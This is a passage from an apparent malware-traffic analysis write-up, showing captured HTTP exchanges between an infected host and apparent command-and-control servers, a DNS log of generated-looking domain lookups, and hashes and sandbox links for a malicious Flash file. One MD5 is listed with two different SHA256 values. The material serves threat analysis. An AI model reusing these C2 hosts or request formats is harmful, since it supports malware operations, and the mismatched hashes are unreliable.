rv:11.0) like Gecko\r\n\tContent-Length: 214\r\n\tHost: ncqauqvqqhhzpc.com\r\n\r\n\tmoycq=uskrE77T5r1UtuRf&esuyuc=5EogXNdl7mULw6YgehMEBu4n&eicww5=JN8vwWDSDeUquJeK&my=QgXKqX\/MgvVEp\/o1IfmO&we=sfFo65FUZ5QDgmswsUkkj2Fg&wkmekkc=UZDILSO9ndxh\/s7z&m=N\/0xqJ\/9awqYtpKpX6eb6939K4FBS4Qy0au\/Zwn3IbHiS9IQjG3yN7M=\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\r\n\tDate: Tue, 24 Nov 2015 16:16:45 GMT\r\n\tContent-Type: application\/octet-stream\r\n\tContent-Length: 671932\r\n\tConnection: keep-alive\r\n\tSet-Cookie: PHPSESSID=52f98d522ab4e44a8cf557ed9830dc51; expires=Wed, 25-Nov-2015 16:16:45 GMT\r\n\tSet-Cookie: zebra=5401; expires=Wed, 25-Nov-2015 16:16:45 GMT\r\n\tSet-Cookie: spittle=7253; expires=Wed, 25-Nov-2015 16:16:45 GMT\r\n\tSet-Cookie: saffrons=3122; expires=Wed, 25-Nov-2015 16:16:45 GMT\r\n\tSet-Cookie: revisiting=3533; expires=Wed, 25-Nov-2015 16:16:45 GMT\r\n\tSet-Cookie: yogi=4911; expires=Wed, 25-Nov-2015 16:16:45 GMT\r\n\r\n\t-----\r\n\r\n\tPOST \/blog_ajax.php HTTP\/1.1\r\n\tConnection: Keep-Alive\r\n\tAccept: text\/html, application\/xhtml+xml, *\/*\r\n\tAccept-Language: en-US\r\n\tReferer: http:\/\/ncqauqvqqhhzpc.com\/newthread.php\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tContent-Length: 996\r\n\tHost: ncqauqvqqhhzpc.com\r\n\tCookie: yogi=4911; revisiting=3533; saffrons=3122; spittle=7253; zebra=5401; PHPSESSID=52f98d522ab4e44a8cf557ed9830dc51\r\n\r\n\tc1=gmxF3phTjC+8OFSGFNCdljAPS0FGt3OrKkO2rt71bkoTFgcUyJcx\/3Pm+fQoubED4QiA1EGXVmmKkLotN6lYw0rZ83NSrcQwLJmoJXa7pNalVstc&wciqei=+Wh9WDa2CTJA6H07QIzW9BWR14ILJumro+UojZayYUYndmrStcwZqEanE6tnooX2bUl2lDl9Q0SiMMR6iOdPYGXmqKxntkC54efmn9ECKLWoykp0KoowkyeLRTHVc73xFPPbVGlrEmgjqXg\/Tu0RyFCKoJmJW699rsZ0NK9dtCPbpZCw3iIPVJMLiQXQ9uRs6TGHaYoiH78+D8fgAY0Aq1A3&qeoqeeq=Q+fWoMnvsrmEM8iDyNIz7ccDVeRmhcoFeUrCD6+gnHYbXB748S6h0o7E2zxXxC3aH+PgDIesUKaAbT3TABkWNQFglVRXEeaIs4+4S4Wa\/2wODHbbgzofHqucgiqz4RJg&oi=aMKP8Kk4nh8286Us7L\/9VTrztIDRNq\/I3jJJpkO+WD9DuVtYgWnaXtR1hiYFBE06Wy6wyjzSBDI9HqcKBYPoNlQ9PZ10hXbmJcNK1qnv+NlTAt51TEyBbQ4er0b2JF1lQK0WIhKGbwAFbmY7pqUMgPo5yV+b+nYcCh3pHU43&mium5=4lH4p7o6NX+W0FxYJBt8L26UFaZ4sqGRyvg58sZZDUYn1eynh5+s3rpYOvlqWylYiqV7NzYiGPqN\/BeArceWuphTwo1aXyn+GTHoHi7CnLrfSnYmcqxEg3yjC4jlBCUAQirXOL0KccjnincV6uLUQELc&moo=qf44CM+7QIwIOumHRqN59g8R4FzuCM0JLyITIC3+X16YW7egCD4z86y\/wZQUVUWhRArANwZdDj1ixy\/fHlSwEBN4RoBl\/L+iQSohJcSqNgLIfIOyopy7Bzqmr8zCcErpZYANscig7vbesHGijVmeuupkHodtFABMBc6Hj8+MfMCLNoHLDQY04qJf\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\r\n\tDate: Tue, 24 Nov 2015 16:17:08 GMT\r\n\tContent-Type: application\/octet-stream\r\n\tContent-Length: 37\r\n\tConnection: keep-alive\r\n\r\n\t.J..........|...4.+...+....3.g2M.....\r\n\t<\/pre>\n
\r\n\tPOST \/news.php HTTP\/1.0\r\n\tHost: chin.truffleman.co.uk\r\n\tAccept: *\/*\r\n\tAccept-Encoding: identity, *;q=0\r\n\tAccept-Language: en-US\r\n\tContent-Length: 705\r\n\tContent-Type: application\/octet-stream\r\n\tConnection: close\r\n\tContent-Encoding: binary\r\n\tUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\n\r\n\t.\/6.P.@...(.....5^..?.=..o..}...4...p.:.....?.IF3r+E.i...P.<.+.....5....mpz......wpB..I..h....O.sn..=..fX.+..n.U5...".....u..:>JiS..1&..5.[v...B9...n.....?..y....[...qO.7zafv..L$.,s.c..m.Db;."..+r.=......P.._...!3.jt........b.A....d%.Ck..PDj3*...,...N#`.RQ.....^.J. ..X.C.C..8.+bzh..j..=H4.e.....eW.~.).`.kP....w...H....4..`Ui!vai).\\.l...x.N....N.D.CA..z.K]:..........J.;...cQ...e..L^.^..}...R...0..G\\.+..x..#...6.i.Qf....6..-._t.........C.\\.!.z`l.-O.=.Vt..l.#...`.}q.r.?...2..,.....8.\r\n\t.z.....p...|K.?.0~9y.5g`.\/...U0....bA..p.7...l....r.>B..vb......,L..>.......*y^f...\r\n\t3&K..]:5;.B."...q.z'.%.b..7..W..7.(.Sb.{}....A...d3..3.l2!......(Z...~......E....F.{k(k..I......[2..........j`....Yn.d.m.....<....-....\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.2.1\r\n\tDate: Tue, 24 Nov 2015 16:16:57 GMT\r\n\tContent-Type: text\/html; charset=windows-1251\r\n\tConnection: close\r\n\r\n\t......L.<a. }.&...|.\r\n\t<\/pre>\n\r\n\t11981 176.540744 10.1.25.119 63767 8.8.4.4 53 DNS Standard query 0x2749 A jtikbwiyllxnyi61.com\r\n\t11983 176.819935 8.8.4.4 53 10.1.25.119 63767 DNS Standard query response 0x2749 No such name\r\n\t11984 176.821924 10.1.25.119 60109 8.8.4.4 53 DNS Standard query 0xc23c A ghgmtcrluvghlwc91.com\r\n\t11988 176.915258 8.8.4.4 53 10.1.25.119 60109 DNS Standard query response 0xc23c A 127.0.1.1\r\n\t11989 176.926720 10.1.25.119 58168 8.8.4.4 53 DNS Standard query 0x5cc3 A ghgmtcrluvghlwc91.com\r\n\t11990 177.005193 8.8.4.4 53 10.1.25.119 58168 DNS Standard query response 0x5cc3 A 127.0.1.1\r\n\t11997 178.041367 10.1.25.119 57199 8.8.4.4 53 DNS Standard query 0x043c A qidxwsfqblej.com\r\n\t11998 178.171919 8.8.4.4 53 10.1.25.119 57199 DNS Standard query response 0x043c No such name\r\n\t11999 178.173503 10.1.25.119 58882 8.8.4.4 53 DNS Standard query 0xdad5 A lnhxwmhoyjxqmtgn9u.com\r\n\t12000 178.254598 8.8.4.4 53 10.1.25.119 58882 DNS Standard query response 0xdad5 A 127.0.1.1\r\n\t12001 178.268719 10.1.25.119 52742 8.8.4.4 53 DNS Standard query 0x1cf7 A lnhxwmhoyjxqmtgn9u.com\r\n\t12002 178.348164 8.8.4.4 53 10.1.25.119 52742 DNS Standard query response 0x1cf7 A 127.0.1.1\r\n\t12040 179.351621 10.1.25.119 53261 8.8.4.4 53 DNS Standard query 0xf345 A hsgxnjpdzifkjl4r.com\r\n\t12068 179.449632 8.8.4.4 53 10.1.25.119 53261 DNS Standard query response 0xf345 No such name\r\n\t12073 179.452374 10.1.25.119 62977 8.8.4.4 53 DNS Standard query 0x57eb A xwhrskktvevezz0.com\r\n\t12112 179.540378 8.8.4.4 53 10.1.25.119 62977 DNS Standard query response 0x57eb No such name\r\n\t12113 179.542265 10.1.25.119 50010 8.8.4.4 53 DNS Standard query 0x2997 A rnhbhnlmpvvdt.com\r\n\t12158 179.651092 8.8.4.4 53 10.1.25.119 50010 DNS Standard query response 0x2997 A 166.78.145.90\r\n\t12163 179.663157 10.1.25.119 50005 8.8.4.4 53 DNS Standard query 0xb4c8 A rnhbhnlmpvvdt.com\r\n\t12194 179.748103 8.8.4.4 53 10.1.25.119 50005 DNS Standard query response 0xb4c8 A 166.78.145.90\r\n\t12303 179.968038 10.1.25.119 61287 8.8.4.4 53 DNS Standard query 0xb54b A qtllebdadvitdim.com\r\n\t12334 180.059365 8.8.4.4 53 10.1.25.119 61287 DNS Standard query response 0xb54b No such name\r\n\t12335 180.060984 10.1.25.119 56286 8.8.4.4 53 DNS Standard query 0x9da2 A wyvpeiyaxycznuia6.com\r\n\t12372 180.155660 8.8.4.4 53 10.1.25.119 56286 DNS Standard query response 0x9da2 No such name\r\n\t12373 180.157299 10.1.25.119 49396 8.8.4.4 53 DNS Standard query 0xb029 A ncqauqvqqhhzpc.com\r\n\t12411 180.238941 8.8.4.4 53 10.1.25.119 49396 DNS Standard query response 0xb029 A 95.211.205.229\r\n\t12415 180.252274 10.1.25.119 51862 8.8.4.4 53 DNS Standard query 0x7ebc A ncqauqvqqhhzpc.com\r\n\t12453 180.348244 8.8.4.4 53 10.1.25.119 51862 DNS Standard query response 0x7ebc A 95.211.205.229\r\n\t13636 193.071344 10.1.25.119 55508 8.8.4.4 53 DNS Standard query 0x8551 A chin.truffleman.co.uk\r\n\t13637 193.272985 8.8.4.4 53 10.1.25.119 55508 DNS Standard query response 0x8551 A 151.80.126.226\r\n\t<\/pre>\n
\n=================================================
\n![\"Results](\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/12\/Img3.png\")
<\/a><\/p>\n
\n===========================================
\nFile Name: neuhaus-who.olp.swf
\nMD5: e7540e851a7334a3ce068e772b205ece
\nSHA256: d0b17166e0f1557468536bb303d3408e827952761703c3a67f4724678e3b88e9
\nFirst submission: 2015-12-04 14:39:03 UTC
\nDetection ratio: 6 \/ 55
\nVirustotal link: http:\/\/www.virustotal.com\/en\/file\/d0b17166e0f1557468536bb303d3408e827952761703c3a67f4724678e3b88e9\/analysis\/1449239943\/<\/a>
\nHybrid-Analysis link (Windows 7 x64): http:\/\/www.hybrid-analysis.com\/sample\/d0b17166e0f1557468536bb303d3408e827952761703c3a67f4724678e3b88e9?environmentId=2<\/a>
\nHybrid-Analysis link (Windows 7 x32): http:\/\/www.hybrid-analysis.com\/sample\/d0b17166e0f1557468536bb303d3408e827952761703c3a67f4724678e3b88e9?environmentId=1<\/a>
\nMalwr link: http:\/\/malwr.com\/analysis\/ZTgzN2QxODY5ZjcxNGZlYWFjYzM1ZDQxMDUxNjQ2MjM\/<\/a><\/p>\n
\nMD5: 478294cf3367385f8715198fa27d0305
\nSHA256: f868ab2a5208891bdbbd02a85d2d1a3757ae74685504b99f192cdb12fc9eace8
\nFirst submission: 2015-12-04 15:26:43 UTC
\nDetection ratio: 0 \/ 55
\nVirustotal link: http:\/\/www.virustotal.com\/en\/file\/f868ab2a5208891bdbbd02a85d2d1a3757ae74685504b99f192cdb12fc9eace8\/analysis\/1449242803\/<\/a><\/p>\n
\nMD5: e7540e851a7334a3ce068e772b205ece
\nSHA256: f868ab2a5208891bdbbd02a85d2d1a3757ae74685504b99f192cdb12fc9eace8
\nFirst submission: 2015-12-04 14:39:03 UTC
\nDetection ratio: 0 \/ 55
\nVirustotal link: http:\/\/www.virustotal.com\/en\/file\/f868ab2a5208891bdbbd02a85d2d1a3757ae74685504b99f192cdb12fc9eace8\/analysis\/1449242803\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"